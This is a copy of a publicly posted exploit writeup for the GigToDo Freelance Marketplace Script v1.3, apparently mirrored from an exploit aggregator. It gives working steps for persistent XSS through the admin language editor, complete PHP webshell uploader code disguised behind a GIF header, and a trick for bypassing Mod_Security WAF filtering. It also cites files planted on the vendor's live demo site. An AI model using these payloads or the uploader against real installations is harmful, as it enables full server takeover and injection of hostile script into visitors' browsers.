Advertisement






GigToDo - Freelance Marketplace Script v1.3 Persistent XSS Injection & WebShell Upload

CVE Category Price Severity
CWE-79 $500 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2019-07-26
CVSS EPSS EPSSP
Not available 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019070115

Below is a copy:

GigToDo - Freelance Marketplace Script v1.3 Persistent XSS Injection & WebShell Upload
/*!
* # Exploit Title: GigToDo - Freelance Marketplace Script v1.3 Persistent XSS Injection & WebShell Upload
* # Google Dork: -
* # Date: 2019/07/22
* # Author: m0ze
* # Vendor Homepage: https://www.gigtodoscript.com
* # Software Link: https://codecanyon.net/item/gigtodo-freelance-marketplace-script/23855397
* # Version: <= 1.3
* # Tested on: NginX/1.15.10
* # CVE: -
* # CWE: CWE-79, CWE-434
*/

::- Details & Description -::
~ The GigToDo - Freelance Marketplace Script web-application is vulnerable to persistent XSS injections and WebShell uploads that allows an attacker to inject JavaScript or HTML code into the front-end or take the full control over the project/server.

::- Demo Website -::
~ Frontend: https://www.gigtodo.com
~ Backend: https://www.gigtodo.com/admin/login.php
~ Login / Password: [email protected] / Pat

::- Special Note -::
~ Web-application price is $175, 8 Sales.
~ On the demo website you'll face the Mod_Security WAF which is possible to bypass, just read the Important Stuff note at the end of this document. There is no guarantee that customers will use some kind of WAF, so entire exploiting process may be much easier.
~ file_put_contents() isn't disabled so this may well be another attack vector. Files https://www.gigtodo.com/m0ze.txt and https://www.gigtodo.com/m0ze.php was created by using this method.
~ Mod_Security WAF can be triggered on <input> tag. To bypass it, simply break the input word, f.e.: <in put>. On the front-end use Developer Console and merge this HTML tag back to <input>.

::- PoC Links -::
~ https://www.gigtodo.com/m0ze.txt
~ https://www.gigtodo.com/m0ze.php
~ https://www.gigtodo.com/vh.php

::- PoC [Basic Stuff] -::
~ First of all we need to create a new language for the front-end here https://www.gigtodo.com/admin/index?insert_language -> for the Language Title input field use smth unique and simple (like your handle/nickname but w/o special chars and symbols), for the Language Image choose any image u want then press Insert Language button. After successful submit there will be .php file with your name inside the https://www.gigtodo.com/languages/ directory (I've used m0ze as a language name, so my file is https://www.gigtodo.com/languages/m0ze.php). On the https://www.gigtodo.com/admin/index?view_languages page you'll see your language for front-end, so press the Settings button and you'll see a text editor. That's what we need.

::- PoC [Persistent XSS Injection] -::
~ For persistent XSS injection u need to add ur payload inside any translation value (check examples below) and then press Update Language Settings button. The final step is to activate ur updated file (read the Important Stuff below).
~ Example #1: $lang["find_us_on"] = "FIND US ON<img src=https://www.gigtodo.com/images/t5ehiaquEEQ.jpg onload=alert('m0ze')>";
~ Example #2: $lang["sign_in"] = "Sign In</a><img src=x><a>";

::- PoC [WebShell Upload] -::
~ Delete all existed data from ur language file (CTRL + A -> Del) and use this code to create a simple file uploader:
GIF89;a
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<style>*{font-family:'Courier New',sans-serif;font-size:14px;color:#ff003b;background-color:black;}</style>
</head>
<body>
<?php echo "<center>File Uploader :: m0ze<br>";echo "<form method='POST' enctype='multipart/form-data'><input type='file' name='file2upload'><input type='submit' name='upload' value='Upload'></form></center>";$files = $_FILES['file2upload']['name'];if(isset($_POST['upload'])){if(@copy($_FILES['file2upload']['tmp_name'], $files)){echo "<center>[+] File <b>$files</b> has been uploaded [+]</center>";}else{echo "<center>[-] Upload has failed [-]</center>";}} ?>
</body>
</html>
Make sure that u copy all the code above from GIF89;a to </html>, otherwise u'll face the Mod_Security alert. Press Update Language Settings button and u must see the success alert message. The final step is to activate ur updated file (read the Important Stuff below) and upload any file u want.

::- PoC [Important Stuff] -::
~ Keep in mind that code inside ur language file WILL NOT WORK UNTILL U ACTIVATE IT. For activation go to the front-end https://www.gigtodo.com and scroll page down, on the right side u'll see the FIND US ON text and language select option on the bottom. Select ur language from the list and wait until the page reloads. That's it, now ur code up and running.

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.